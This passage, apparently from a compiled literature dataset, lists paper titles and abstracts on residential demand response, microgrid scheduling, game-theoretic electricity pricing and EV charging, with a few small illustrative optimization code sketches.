is superior to the other tested PSO variants, demonstrating its adequacy to solve large dimension problems which require a decision in a short period of time. --- paper_title: Optimal control of a residential microgrid paper_content: We propose a generic mixed integer linear programming model to minimize the operating cost of a residential microgrid. We model supply and demand of both electrical and thermal energy as decision variables. The modeled microgrid is operated in grid-connected mode. It covers solar energy, distributed generators, energy storages, and loads, among them controllable load jobs released by home appliances and electric vehicles. We propose a model predictive control scheme to iteratively produce a control sequence for the studied microgrid. Our case study reveals the performance of minimum cost control by comparison with benchmark control policies. We consider three price scenarios in our analyses which include two market-based scenarios. Numerical results from our study indicate savings in annual operating cost between 3.1 and 7.6 percent. --- paper_title: Dynamic Residential Demand Response and Distributed Generation Management in Smart Microgrid with Hierarchical Agents paper_content: Smart grid has been a significant development trend of power systems. Within the smart grid, microgrids share the burden of traditional grids, reduce energy consumption cost and alleviate environmental deterioration. This paper proposes a dynamic Demand Response (DR) and Distributed Generation (DG) management approach in the context of a smart microgrid for a residential community. With a dynamic update mechanism, the DR operates automatically and allows manual interference.
The DG management coordinates with DR and considers stochastic elements, such as stochastic load and wind power, to reduce the energy consumption cost of the community. Simulation and numerical results show the effectiveness of the system on reducing the energy consumption cost while keeping users’ satisfaction at a high level. --- paper_title: Control for large scale demand response of thermostatic loads* paper_content: Demand response is an important Smart Grid concept that aims at facilitating the integration of volatile energy resources into the electricity grid. This paper considers a residential demand response scenario and specifically looks into the problem of managing a large number thermostat-based appliances with on/off operation. The objective is to reduce the consumption peak of a group of loads composed of both flexible and inflexible units. The power flexible units are the thermostat-based appliances. We discuss a centralized, model predictive approach and a distributed structure with a randomized dispatch strategy. --- paper_title: Optimized Day-Ahead Pricing for Smart Grids with Device-Specific Scheduling Flexibility paper_content: Smart grids are capable of two-way communication between individual user devices and the electricity provider, enabling providers to create a control-feedback loop using time-dependent pricing. By charging users more in peak and less in off-peak hours, the provider can induce users to shift their consumption to off-peak periods, thus relieving stress on the power grid and the cost incurred from large peak loads. We formulate the electricity provider's cost minimization problem in setting these prices by considering consumers' device-specific scheduling flexibility and the provider's cost structure of purchasing electricity from an electricity generator. Consumers' willingness to shift their device usage is modeled probabilistically, with parameters that can be estimated from real data. We develop an algorithm for computing day-ahead prices, and another algorithm for estimating and refining user reaction to the prices. Together, these two algorithms allow the provider to dynamically adjust the offered prices based on user behavior. Numerical simulations with data from an Ontario electricity provider show that our pricing algorithm can significantly reduce the cost incurred by the provider. --- paper_title: An integer linear programming based optimization for home demand-side management in smart grid paper_content: We propose a consumption scheduling mechanism for home area load management in smart grid using integer linear programming (ILP) technique. The aim of the proposed scheduling is to minimise the peak hourly load in order to achieve an optimal (balanced) daily load schedule. The proposed mechanism is able to schedule both the optimal power and the optimal operation time for power-shiftable appliances and time-shiftable appliances respectively according to the power consumption patterns of all the individual appliances. Simulation results based on home and neighbourhood area scenarios have been presented to demonstrate the effectiveness of the proposed technique. --- paper_title: A linear programming model for reducing system peak through customer load control programs paper_content: A linear programming (LP) model has been developed to optimize the amount of power system peak load reduction through scheduling of control periods in commercial/industrial and residential load control programs at Florida Power and Light Company, USA. 
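As a toy illustration of this kind of peak-clipping LP (with invented load and program data, and none of the utility-specific constraints of the original model), one can minimize the peak directly with scipy.optimize.linprog: the peak is an auxiliary variable that must dominate the controlled load in every hour, while each program respects per-hour and daily-energy limits.

```python
import numpy as np
from scipy.optimize import linprog

HOURS = 24
base = 900 + 250 * np.sin(np.linspace(0, 2 * np.pi, HOURS))   # MW, toy forecast
programs = [                     # (max reduction per hour MW, max total MWh/day), assumed
    (60.0, 300.0),               # e.g. commercial/industrial curtailment
    (40.0, 200.0),               # e.g. residential appliance control
]
n_prog = len(programs)
n_var = n_prog * HOURS + 1       # r[i, h] flattened, plus the peak variable P

c = np.zeros(n_var)
c[-1] = 1.0                      # objective: minimize the peak P

A_ub, b_ub = [], []
for h in range(HOURS):           # base[h] - sum_i r[i, h] <= P
    row = np.zeros(n_var)
    for i in range(n_prog):
        row[i * HOURS + h] = -1.0
    row[-1] = -1.0
    A_ub.append(row)
    b_ub.append(-base[h])
for i, (_, e_max) in enumerate(programs):   # sum_h r[i, h] <= daily energy budget
    row = np.zeros(n_var)
    row[i * HOURS: (i + 1) * HOURS] = 1.0
    A_ub.append(row)
    b_ub.append(e_max)

bounds = [(0.0, cap) for cap, _ in programs for _ in range(HOURS)] + [(0.0, None)]
res = linprog(c, A_ub=np.array(A_ub), b_ub=np.array(b_ub), bounds=bounds, method="highs")
print(f"uncontrolled peak: {base.max():.0f} MW, controlled peak: {res.x[-1]:.0f} MW")
```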
The LP model can be used to determine both long and short term control scheduling strategies and to plan the number of customers that should be enrolled in each program. Results of applying the model to a forecasted late 1990s summer peak day load shape are presented. It is concluded that LP solutions provide a relatively inexpensive and powerful approach to planning and scheduling load control. Also, it is not necessary to model completely general scheduling of control periods in order to obtain near best solutions to peak load reduction. --- paper_title: Control method for multi-microgrid systems in smart grid environment—Stability, optimization and smart demand participation paper_content: This paper presents a control strategy for microgrids in a smart grid environment. A hierarchical control strategy is developed to ensure stability and to optimize the operation of the microgrid. The communication, control and advanced metering infrastructure of smart grids are used to facilitate this control strategy. The control strategy incorporates storage devices, electric cars, various distributed energy resources and loads. The proposed control strategy considers microgrid operation in island and grid-connected mode. The islanded microgrid is stabilized by managing storage devices, dispatchable energy units and controllable loads. The control strategy is based on demand participation while the stability of the system has the highest priority. Theoretical discussion of the presented algorithms clearly reveals the effectiveness of the proposed control method. --- paper_title: Parallel autonomous optimization of demand response with renewable distributed generators paper_content: We propose a framework for demand response in smart grids that integrate renewable distributed generators (DGs). In this framework, some users have DGs and can generate part of their electricity. They can also sell extra generation to the utility company. The goal is to optimize the load schedule of users to minimize the utility company's cost and user payments. We employ parallel autonomous optimization, where each user requires only knowledge of the aggregated load of other users instead of the load profiles of individual users, and can execute distributed optimization simultaneously. We performed numerical examples to validate our algorithm. The results show that our method can significantly lower peak hour load and reduce the costs to users and the utility. Since the autonomous user optimizations are executed in parallel, our method also dramatically decreases the computation time, management complexity, and communication costs. --- paper_title: Optimal Scheduling of Smart Homes Energy Consumption with Microgrid paper_content: The microgrid is taken as the future Smart Grid, and can work as a local energy provider to domestic buildings and reduce energy expenses. To further lower the cost, a Smart Homes idea is suggested. Smart Homes of the future will include automation systems and could provide lower energy consumption costs and a comfortable and secure living environment to end users. If the energy consumption tasks across multiple homes can be scheduled based on the users' requirements, the energy cost and peak demand could be reduced. In this paper the optimal scheduling of smart homes' energy consumption is presented using mixed-integer linear programming.
In order to minimize a one-day forecasted energy consumption cost, operation and electricity consumption tasks are scheduled based on different electricity tariffs, electricity task time windows and forecasted renewable energy output. A case study of thirty homes with their own microgrid indicates the possibility of cost saving and increased asset utilization. --- paper_title: Demand response models with correlated price data: A robust optimization approach paper_content: In the electricity industry, the processes through which consumers respond to price signals embedded in tariffs by changing their consumption patterns are generally referred to as demand response. In such a context, consumers are offered an opportunity to maximize the surplus derived from electricity usage by actively scheduling consumption over time periods with potentially different energy prices. The objective of this work is to analyze the role of correlation in prices of successive periods over which consumption is to be scheduled, in a demand response context. We use robust optimization techniques to propose an optimization model for consumption scheduling when prices of different periods are highly correlated, and also suggest approaches to correctly incorporate real-world correlated price data into this model. Positive results from quantitative case studies indicate that it is of great importance to employ a solution approach that correctly models correlation among prices when scheduling consumption. --- paper_title: Multi-objective self-scheduling of CHP (combined heat and power)-based microgrids considering demand response programs and ESSs (energy storage systems) paper_content: Today, policy makers, governments, and academic experts in flourishing societies are interested in employing power systems considering high reliability, quality, and efficiency factors. Moreover, climatic concerns force power system operators to utilize these systems in a more environmentally friendly manner. To achieve these aims, MGs (microgrids) act as key solutions. MGs are invented not only to operate power systems more reliably and efficiently but also to penetrate CHP (combined heat and power)-based DG (distributed generation) into power systems with optimal control of their generation. This paper presents a new optimal operation of a CHP-based MG comprising ESS (energy storage system), three types of thermal power generation units, and DRPs (demand response programs). In this paper, DRPs are treated as virtual generation units along with all of their realization constraints. In a multi-objective self-scheduling optimization problem of an MG, the first objective deals with minimizing the total operational cost of the CHP-MG in an OPF-based formulation and the second refers to the emission minimization of DGs. The proposed model implements a simple MIP (mixed-integer programming) formulation that can be easily integrated in the MGCC (MG central controller). The effectiveness of the proposed methodology has been investigated on a typical 24-bus MG. --- paper_title: Optimal dispatching model of Smart Home Energy Management System paper_content: In this paper, we developed an optimal dispatching model of a Smart Home Energy Management System (SHEMS) with distributed energy resources (DERs) and intelligent domestic appliances. In order to achieve a multi-objective trade-off between saving money and living comfortably, we investigate the mathematical models of various components and introduce the new concept of "load value" as a quantitative measure of users' comfort.
Then we set up the control strategies with demand response and adjust the parameters of the optimal dispatching model according to the load characteristics of this system. Applying this model to one house with Photovoltaic (PV), wind turbine (WT), storage battery and time-of-use prices, the simulation at the end of this paper proves that the energy management system and optimal dispatching model can enable smart home users to live in a comfortable and economical way. --- paper_title: A taxonomy of line balancing problems and their solution approaches paper_content: Line balancing belongs to a class of intensively studied combinatorial optimization problems known to be NP-hard in general. For several decades, the core problem originally introduced for manual assembly has been extended to suit robotic, machining and disassembly contexts. However, despite various industrial environments and line configurations, often quite similar or even identical mathematical models have been developed. The objective of this survey is to analyze recent research on balancing flow lines within many different industrial contexts in order to classify and compare the means for input data modelling, constraints and objective functions used. This survey covers about 300 studies on line balancing problems. Particular attention is paid to recent publications that have appeared in 2007–2012 to focus on new advances in the state-of-the-art. --- paper_title: Coordinated home energy management for real-time power balancing paper_content: This paper proposes a coordinated home energy management system (HEMS) architecture where the distributed residential units cooperate with each other to achieve real-time power balancing. The economic benefits for the retailer and incentives for the customers to participate in the proposed coordinated HEMS program are given. We formulate the coordinated HEMS design problem as a dynamic programming (DP) problem and use approximate DP approaches to efficiently handle the design problem. A distributed implementation algorithm based on the convex optimization based dual decomposition technique is also presented. Our focus in the current paper is on the deferrable appliances, such as Plug-in (Hybrid) Electric Vehicles (PHEV), in view of their higher impact on the grid stability. Simulation results show that the proposed coordinated HEMS architecture can efficiently improve the real-time power balancing. --- paper_title: Cooperative multi-residence demand response scheduling paper_content: This paper is concerned with scheduling of demand response among different residences and a utility company. The utility company has a cost function representing the cost of providing energy to end-users, and this cost can vary across the scheduling horizon. Each end-user has a "must-run" load, and two types of adjustable loads. The first type must consume a specified total amount of energy over the scheduling horizon, but the consumption can be adjusted across different slots. The second type of load has adjustable power consumption without a total energy requirement, but operation of the load at reduced power results in dissatisfaction of the end-user. The problem amounts to minimizing the total cost of electricity plus the total user dissatisfaction (social welfare), subject to the individual load consumption constraints. The problem is convex and can be solved by a distributed subgradient method.
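A bare-bones version of the price-signal exchange behind such a subgradient method is sketched below. For brevity the coupling here is a per-slot capacity limit and each user has a simple quadratic utility, which is a stand-in for, not a reproduction of, the cost-plus-dissatisfaction model of the entry above; all numbers are invented.

```python
# Dual-subgradient coordination sketch: a coordinator announces per-slot prices
# (Lagrange multipliers), users reply with their individually optimal loads, and
# the prices are nudged until aggregate load respects each slot's capacity.
SLOTS = 4
CAPACITY = [8.0, 8.0, 12.0, 12.0]                  # per-slot supply limit (kW), assumed
USERS = [                                           # per-slot utility u(x) = a*x - 0.5*b*x^2
    [(6.0, 1.0), (5.0, 1.0), (3.0, 1.0), (2.0, 1.0)],
    [(5.0, 1.0), (6.0, 1.0), (4.0, 1.0), (3.0, 1.0)],
    [(4.0, 1.0), (4.0, 1.0), (5.0, 1.0), (6.0, 1.0)],
]

def best_response(params, prices):
    """Each user maximizes u(x) - price*x slot by slot (closed form, clipped at 0)."""
    return [max(0.0, (a - lam) / b) for (a, b), lam in zip(params, prices)]

prices = [0.0] * SLOTS
step = 0.05
for it in range(2000):
    loads = [best_response(u, prices) for u in USERS]
    agg = [sum(x[t] for x in loads) for t in range(SLOTS)]
    # subgradient step on the dual: raise the price where capacity is exceeded
    prices = [max(0.0, lam + step * (agg[t] - CAPACITY[t])) for t, lam in enumerate(prices)]

final_loads = [best_response(u, prices) for u in USERS]
agg = [sum(x[t] for x in final_loads) for t in range(SLOTS)]
print("prices:        ", [round(p, 2) for p in prices])
print("aggregate load:", [round(a, 2) for a in agg])
print("capacity:      ", CAPACITY)
```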
The utility company and the end-users exchange Lagrange multipliers—interpreted as pricing signals—and hourly consumption data through the Advanced Metering Infrastructure, in order to converge to the optimal amount of electricity production and the optimal power consumption schedule. --- paper_title: Optimal Real-Time Pricing Algorithm Based on Utility Maximization for Smart Grid paper_content: In this paper, we consider a smart power infrastructure, where several subscribers share a common energy source. Each subscriber is equipped with an energy consumption controller (ECC) unit as part of its smart meter. Each smart meter is connected to not only the power grid but also a communication infrastructure such as a local area network. This allows two-way communication among smart meters. Considering the importance of energy pricing as an essential tool to develop efficient demand side management strategies, we propose a novel real-time pricing algorithm for the future smart grid. We focus on the interactions between the smart meters and the energy provider through the exchange of control messages which contain subscribers' energy consumption and the real-time price information. First, we analytically model the subscribers' preferences and their energy consumption patterns in form of carefully selected utility functions based on concepts from microeconomics. Second, we propose a distributed algorithm which automatically manages the interactions among the ECC units at the smart meters and the energy provider. The algorithm finds the optimal energy consumption levels for each subscriber to maximize the aggregate utility of all subscribers in the system in a fair and efficient fashion. Finally, we show that the energy provider can encourage some desirable consumption patterns among the subscribers by means of the proposed real-time pricing interactions. Simulation results confirm that the proposed distributed algorithm can potentially benefit both subscribers and the energy provider. --- paper_title: Optimal Power Allocation Under Communication Network Externalities paper_content: Efficient resource allocation is an important problem that aims for a “greener” and more environmentally friendly electric power grid. The smart behavior of the newly emerged grid, combined with two-way communication between users and the operator allows for actions like measurement, monitoring, prediction, and control signaling so as to maximize social welfare. We introduce a framework for optimal resource allocation in smart grids that also considers the uncertainty in message signaling. This introduces communication network externalities, added on top of the existing transmission network ones. The task at hand resembles the so called local public goods problem in mathematical economics terminology, a problem impractical to solve using centralized mechanisms. We propose an iterative, decentralized algorithm for its solution. The algorithm is scalable for deployment in large networks since it requires only messages per network user per iteration, where is the number of users. Moreover, it is guaranteed to converge, does not require revelation of private information from each user and all algorithm actions can be realized by programmable smart devices of the grid. --- paper_title: Optimal demand response based on utility maximization in power networks paper_content: Demand side management will be a key component of future smart grid that can help reduce peak load and adapt elastic demand to fluctuating generations. 
In this paper, we consider households that operate different appliances including PHEVs and batteries and propose a demand response approach based on utility maximization. Each appliance provides a certain benefit depending on the pattern or volume of power it consumes. Each household wishes to optimally schedule its power consumption so as to maximize its individual net benefit subject to various consumption and power flow constraints. We show that there exist time-varying prices that can align individual optimality with social optimality, i.e., under such prices, when the households selfishly optimize their own benefits, they automatically also maximize the social welfare. The utility company can thus use dynamic pricing to coordinate demand responses to the benefit of the overall system. We propose a distributed algorithm for the utility company and the customers to jointly compute this optimal prices and demand schedules. Finally, we present simulation results that illustrate several interesting properties of the proposed scheme. --- paper_title: Vehicle-to-Aggregator Interaction Game paper_content: Electric vehicles (EVs) are likely to become very popular worldwide within the next few years. With possibly millions of such vehicles operating across the country, one can establish a distributed electricity storage system that comprises of the EVs' batteries with a huge total storage capacity. This can help the power grid by providing various ancillary services, once an effective vehicle-to-grid (V2G) market is established. In this paper, we propose a new game-theoretic model to understand the interactions among EVs and aggregators in a V2G market, where EVs participate in providing frequency regulation service to the grid. We develop a smart pricing policy and design a mechanism to achieve optimal frequency regulation performance in a distributed fashion. Simulation results show that our proposed pricing model and designed mechanism work well and can benefit both EVs (in terms of obtaining additional income) and the grid (in terms of achieving the frequency regulation command signal). --- paper_title: Two Market Models for Demand Response in Power Networks paper_content: In this paper, we consider two abstract market models for designing demand response to match power supply and shape power demand, respectively. We characterize the resulting equilibria in competitive as well as oligopolistic markets, and propose distributed demand response algorithms to achieve the equilibria. The models serve as a starting point to include the appliance-level details and constraints for designing practical demand response schemes for smart power grids. --- paper_title: A cheat-proof game theoretic demand response scheme for smart grids paper_content: While demand response has achieved promising results on making the power grid more efficient and reliable, the additional dynamics and flexibility brought by demand response also increase the uncertainty and complexity of the centralized load forecast. In this paper, we propose a game theoretic demand response scheme that can transform the traditional centralized load prediction structure into a distributed load prediction system by the participation of customers. Moreover, since customers are generally rational and thus naturally selfish, they may cheat if cheating can improve their payoff. Therefore, enforcing truth-telling is crucial. 
We prove analytically and demonstrate with simulations that the proposed game theoretic scheme is cheat-proof, i.e., all customers are motivated to report and consume their true optimal demands and any deviation will lead to a utility loss. We also prove theoretically that the proposed demand response scheme can lead to the solution that maximizes social welfare and is proportionally fair in terms of utility function. Moreover, we propose a simple dynamic pricing algorithm for the power substation to control the total demand of all customers to meet the target demand curve. Finally, simulations are shown to demonstrate the efficiency and effectiveness of the proposed game theoretic algorithm. --- paper_title: A differential game approach to distributed demand side management in smart grid paper_content: Smart grid is a visionary user-centric system that will elevate the conventional power grid system to one which functions more cooperatively, responsively, and economically. Dynamic demand side management is one of the key issues that enable the implementation of smart grid. In this paper, we use the framework of dynamic games to model the distribution demand side management. The market price is characterized as the dynamic state using a sticky price model. A two-layer optimization framework is established. At the lower level, for each player (such as one household), different appliances are scheduled for energy consumption. At the upper level, the dynamic game is used to capture the interaction among different players in their demand responses through the market price. We analyze the N-person nonzero-sum stochastic differential game and characterize its feedback Nash equilibrium. A special case of homogeneous users is investigated in detail and we provide a closed-form solution for the optimal demand response. From the simulation results, we demonstrate the use of demand response strategy from the game-theoretic framework and study the behavior of market price and demand responses to different parameters. --- paper_title: Autonomous Demand-Side Management Based on Game-Theoretic Energy Consumption Scheduling for the Future Smart Grid paper_content: Most of the existing demand-side management programs focus primarily on the interactions between a utility company and its customers/users. In this paper, we present an autonomous and distributed demand-side energy management system among users that takes advantage of a two-way digital communication infrastructure which is envisioned in the future smart grid. We use game theory and formulate an energy consumption scheduling game, where the players are the users and their strategies are the daily schedules of their household appliances and loads. It is assumed that the utility company can adopt adequate pricing tariffs that differentiate the energy usage in time and level. We show that for a common scenario, with a single utility company serving multiple customers, the global optimal performance in terms of minimizing the energy costs is achieved at the Nash equilibrium of the formulated energy consumption scheduling game. The proposed distributed demand-side energy management strategy requires each user to simply apply its best response strategy to the current total load and tariffs in the power distribution system. The users can maintain privacy and do not need to reveal the details on their energy consumption schedules to other users. 
We also show that users will have incentives to participate in the energy consumption scheduling game and to subscribe to such services. Simulation results confirm that the proposed approach can reduce the peak-to-average ratio of the total energy demand, the total energy costs, as well as each user's individual daily electricity charges. --- paper_title: A nested game-based optimization framework for electricity retailers in the smart grid with residential users and PEVs paper_content: In the smart grid, real-time pricing policy is an important mechanism for incentivizing the consumers to dynamically change or shift their electricity consumption, thereby improving the reliability of the grid. Retailers are incorporated into the smart grid with a distributed control mechanism in order to reduce the amount of communication overhead associated with the direct interaction between utility companies and consumers. The retailer procures electricity from both traditional and renewable energy sources, and sells it to its consumers. The consumers include residential users that can only consume power, and plug-in electric vehicles (PEVs) that can either consume power or supply power stored in their batteries to the grid. In this work, a novel four-stage nested game model is proposed to model the interaction of the electricity retailer, utility companies, and consumers. The objective of the retailer is to maximize its overall profit as well as perform frequency regulation, whereas the goal of each consumer is to maximize a predefined utility function. In the game theoretic framework, the retailer should decide the amounts of electricity purchased from the renewable and traditional energy sources, respectively, as well as the real-time pricing scheme for its consumers. The consumers will react to the pricing mechanism and maximize their utility functions by adjusting the electricity demand. The optimal solution of the nested game is provided through: (i) finding the subgame perfect equilibrium (SPE) of all the consumers, and (ii) optimizing the retailer's action using the backward induction method. Experimental results demonstrate the effectiveness of the proposed game theoretic modeling and optimization framework. --- paper_title: A game-theoretic approach for optimal time-of-use electricity pricing paper_content: Demand for electricity varies throughout the day, increasing the average cost of power supply. Time-of-use (TOU) pricing has been proposed as a demand-side management (DSM) method to influence user demands. In this paper, we describe a game-theoretic approach to optimize TOU pricing strategies (GT-TOU). We propose models of costs to utility companies arising from user demand fluctuations, and models of user satisfaction with the difference between the nominal demand and the actual consumption. We design utility functions for the company and the users, and obtain a Nash equilibrium using backward induction. In addition to a single-user-type scenario, we also consider a scenario with multiple types of users, each of whom responds differently to time-dependent prices. Numerical examples show that our method is effective in leveling the user demand by setting optimal TOU prices, potentially decreasing costs for the utility companies, and increasing user benefits. An increase in the social welfare measure indicates improved market efficiency through TOU pricing.
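The game-theoretic scheduling papers above rely on users repeatedly applying a best-response strategy to the current aggregate load. The sketch below is only an illustration of that idea, not code from any cited work; the price model (marginal price proportional to the total hourly load), the per-hour cap and all numerical values are assumptions made for the example. Under these assumptions each best response reduces to a water-filling allocation, which is why a bisection on the water level is sufficient.

```python
# Illustrative sketch (not from any cited paper): Gauss-Seidel best-response load
# scheduling with an assumed hourly price equal to a * (total hourly load).
import numpy as np

H, N, CAP = 24, 5, 3.0                              # hours, users, per-hour cap on shiftable load
rng = np.random.default_rng(0)
base = rng.uniform(0.5, 1.5, size=(N, H))           # fixed (non-shiftable) loads
E = rng.uniform(4.0, 8.0, size=N)                   # deferrable energy budget per user (kWh)
x = np.zeros((N, H))                                # deferrable schedules (decision variables)

def best_response(load_others, energy):
    """Water-filling: minimize sum_h (load_others[h] + x[h]) * x[h],
    subject to sum_h x[h] = energy and 0 <= x[h] <= CAP."""
    lo, hi = 0.0, 2.0 * (load_others.max() + CAP) + 1.0
    for _ in range(60):                              # bisection on the water level
        lam = 0.5 * (lo + hi)
        xh = np.clip(0.5 * (lam - load_others), 0.0, CAP)
        lo, hi = (lam, hi) if xh.sum() < energy else (lo, lam)
    return xh

for _ in range(50):                                  # best-response iterations until (approx.) equilibrium
    for n in range(N):
        others = base.sum(axis=0) + x.sum(axis=0) - x[n]
        x[n] = best_response(others, E[n])

total = base.sum(axis=0) + x.sum(axis=0)
print("peak-to-average ratio:", total.max() / total.mean())
```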
--- paper_title: Dependable Demand Response Management in the Smart Grid: A Stackelberg Game Approach paper_content: Demand Response Management (DRM) is a key component in the smart grid to effectively reduce power generation costs and user bills. However, it has been an open issue to address the DRM problem in a network of multiple utility companies and consumers where every entity is concerned about maximizing its own benefit. In this paper, we propose a Stackelberg game between utility companies and end-users to maximize the revenue of each utility company and the payoff of each user. We derive analytical results for the Stackelberg equilibrium of the game and prove that a unique solution exists. We develop a distributed algorithm which converges to the equilibrium with only local information available for both utility companies and end-users. Though DRM helps to facilitate the reliability of power supply, the smart grid can be susceptible to privacy and security issues because of communication links between the utility companies and the consumers. We study the impact of an attacker who can manipulate the price information from the utility companies. We also propose a scheme based on the concept of shared reserve power to improve the grid reliability and ensure its dependability. --- paper_title: Economics of Electric Vehicle Charging: A Game Theoretic Approach paper_content: In this paper, the problem of grid-to-vehicle energy exchange between a smart grid and plug-in electric vehicle groups (PEVGs) is studied using a noncooperative Stackelberg game. In this game, on the one hand, the smart grid, which acts as a leader, needs to decide on its price so as to optimize its revenue while ensuring the PEVGs' participation. On the other hand, the PEVGs, which act as followers, need to decide on their charging strategies so as to optimize a tradeoff between the benefit from battery charging and the associated cost. Using variational inequalities, it is shown that the proposed game possesses a socially optimal Stackelberg equilibrium in which the grid optimizes its price while the PEVGs choose their equilibrium strategies. A distributed algorithm that enables the PEVGs and the smart grid to reach this equilibrium is proposed and assessed by extensive simulations. Further, the model is extended to a time-varying case that can incorporate and handle slowly varying environments. --- paper_title: An innovative RTP-based residential power scheduling scheme for smart grids paper_content: This paper proposes a Real-Time Pricing (RTP)-based power scheduling scheme as demand response for residential power usage. In this scheme, the Energy Management Controller (EMC) in each home and the service provider form a Stackelberg game, in which the EMC, which schedules appliances' operation, plays the follower-level game, and the provider, which sets the real-time prices according to the current power usage profile, plays the leader-level game. The sequential equilibrium is obtained through the information exchange between them. Simulation results indicate that our scheme can not only save money for consumers, but also reduce peak load and the variance between demand and supply, while avoiding the "rebound" peak problem. --- paper_title: Real-time welfare-maximizing regulation allocation in aggregator-EVs systems paper_content: The concept of vehicle-to-grid (V2G) has gained recent interest as more and more electric vehicles (EVs) are put to use. In this paper, we consider a dynamic aggregator-EVs system, where an aggregator centrally coordinates a large number of EVs to perform regulation service. We propose a Welfare-Maximizing Regulation Allocation (WMRA) algorithm for the aggregator to fairly allocate the regulation amount among the EVs. The algorithm operates in real time and does not require any prior knowledge of the statistical information of the system. Compared with previous works, WMRA accommodates a wide spectrum of vital system characteristics, including limited EV battery size, EV self charging/discharging, EV battery degradation cost, and the cost of using external energy sources. Furthermore, our simulation results indicate that WMRA can substantially outperform a suboptimal greedy algorithm. --- paper_title: A bilevel model for electricity retailers' participation in a demand response market environment paper_content: Demand response programmes are seen as one of the contributing solutions to the challenges posed to power systems by the large-scale integration of renewable power sources, mostly due to their intermittent and stochastic nature. Among demand response programmes, real-time pricing schemes for small consumers are believed to have significant potential for peak-shaving and load-shifting, thus relieving the power system while reducing costs and risk for energy retailers. This paper proposes a game theoretical model accounting for the Stackelberg relationship between retailers (leaders) and consumers (followers) in a dynamic price environment. Both players in the game solve an economic optimisation problem subject to stochasticity in prices, weather-related variables and must-serve load. The model allows the determination of the dynamic price-signal delivering maximum retailer profit, and the optimal load pattern for consumers under this pricing. The bilevel programme is reformulated as a single-level MILP, which can be solved using commercial off-the-shelf optimisation software. In an illustrative example, we simulate and compare the dynamic pricing scheme with fixed and time-of-use pricing. We find that the dynamic pricing scheme is the most effective in achieving load-shifting, thus reducing retailer costs for energy procurement and regulation in the wholesale market. Additionally, the redistribution of the saved costs between retailers and consumers is investigated, showing that real-time pricing is less convenient than fixed and time-of-use prices for consumers. This implies that careful design of the retail market is needed. Finally, we carry out a sensitivity analysis to analyse the effect of different levels of consumer flexibility. --- paper_title: Auctioning game based Demand Response scheduling in smart grid paper_content: Matching demand to supply is one of the key features of smart grid infrastructure. Transforming conventional static customers into active participants who interact with the electrical utility in real time is the central idea of Demand Response (DR)/Demand Side Management (DSM) in the smart grid. In this paper, we decouple utility cost minimization and customer social welfare maximization into two stages. Since the utility is usually more risk averse than risk neutral in real life, this decoupling approach is more realistic than the usually adopted optimization setup, in which the two objectives are combined in a single weighted sum. With a block processing model introduced, in the first stage a convex optimization problem is formulated to minimize the utility's generation cost and delay operation cost. An optimal load demand scheduling solution, which takes the form of water-filling, is derived analytically. Based on the optimal load profile generated in this first stage, repeated Vickrey auctions over time intervals are adopted to allocate load demands among customers while maximizing the social welfare. Despite the fact that truthful bidding is a weakly dominant strategy for all customers in the auctioning game, collusive equilibria do exist and jeopardize the utility's profit severely. Analysis of the structure of the Bayesian Nash equilibrium solutions shows that by introducing a positive reserve price the Vickrey auction can be made more robust against such collusion by customers. Moreover, the corresponding Bayesian Nash equilibrium is essentially unique and guarantees the basic profit of the utility. We further discuss how customers' valuations and bidding strategies change over time for the repeated Vickrey auction model. Simulation results emphasizing the influences of reserve price and time interval size on the utility's profit are also presented. --- paper_title: Lessons learned from smart grid enabled pricing programs paper_content: Dynamic pricing is often considered an essential part of demand response programs, particularly when considering the advent of new consumer-facing technologies, which will eventually reshape the relationship between utility and consumer. This paper presents and analyzes case studies of several dynamic pricing programs, including different proposed rates, enabling technologies and incentives. Program successes are evaluated based on a combination of peak load reduction, customer bill impacts and customer satisfaction. An analysis of lessons learned is provided on how various factors can affect the success, scalability and applicability of smart grid demand response programs. --- paper_title: Investing in smart grids within the market paradigm: The case of the Netherlands and its relevance for China paper_content: The introduction of market forces in the energy sector in the Netherlands and elsewhere in Europe has drastically changed the climate for investments in the electricity infrastructure. In contrast with the former public monopoly situation, many new uncertainties need to be taken into account in network investment decisions. Another marked difference is the fragmentation of energy markets and the entrance of new players on the energy market stage, often in new roles. The upgrading of electricity networks to create so-called smart grids has therewith become a multi-actor investment problem, which requires a well-designed and well-managed process. For the specific case of the Netherlands, the challenges of smart grid development are explored in depth. As several competing scenarios are possible for the realization of smart grids, it is likely that the scenario first entering the implementation stage will have a first-mover advantage. This, in combination with the split incentive issue for smart grids, results in the conclusion that the realization of smart grids needs public support. Similar outcomes are observed in other European countries despite markedly different local conditions and drivers for the smart grid.
It seems that smart public policy intervention is needed to reduce the overwhelming uncertainties related to smart grid investments, which by far exceed the normal investment risk as encountered in network expansion. Finally, the relevance of these findings is discussed for the future of the electricity sector in China's emerging economy. --- paper_title: Demand Response From Household Customers: Experiences From a Pilot Study in Norway paper_content: This paper presents experiences from a pilot study focusing on daily demand response from households, utilizing smart metering, remote load control, pricing based on the hourly spot price combined with a time of day network tariff, and a token provided to the customers indicating peak hours. The observed demand response was 1 kWh/h for customers with standard electrical water heaters. By aggregating this response, the potential for demand response from 50% of Norwegian households can be estimated at 1000 MWh/h (4.2% of registered peak load demand in Norway). A cost-effective realization of this potential should have high focus when considering smart metering technology. From a market perspective, a potential load reduction of this size should be bid into the day ahead market. Demand response to price (the day after) will not affect the price, but might create imbalances and the need for activating balancing resources, creating additional costs. --- paper_title: How to Engage Consumers in Demand Response: A Contract Perspective paper_content: Nowadays, the European electricity systems are evolving towards a generation mix that is more decentralised, less predictable and less flexible to operate. In this context, additional flexibility is expected to be provided by the demand side. Thus, how to engage consumers to participate in demand response is becoming a pressing issue. In this paper, we provide an analytical framework to assess consumers’ potential and willingness to participate in active demand response from a contract perspective. On that basis, we present policy recommendations to empower and protect consumers in their shift to active demand response participants. --- paper_title: Achieving Optimality and Fairness in Autonomous Demand Response: Benchmarks and Billing Mechanisms paper_content: Autonomous demand response (DR) programs are scalable and result in a minimal control overhead on utilities. The idea is to equip each user with an energy consumption scheduling (ECS) device to automatically control the user's flexible load to minimize his energy expenditure, based on the updated electricity pricing information. While most prior works on autonomous DR have focused on coordinating the operation of ECS devices in order to achieve various system-wide goals, such as minimizing the total cost of generation or minimizing the peak-to-average ratio in the load demand, they fall short addressing the important issue of fairness. That is, while they usually guarantee optimality, they do not assure that the participating users are rewarded according to their contributions in achieving the overall system's design objectives. Similarly, they do not address the important problem of co-existence when only a sub-set of users participate in a deployed autonomous DR program. In this paper, we seek to tackle these shortcomings and design new autonomous DR systems that can achieve both optimality and fairness. In this regard, we first develop a centralized DR system to serve as a benchmark. 
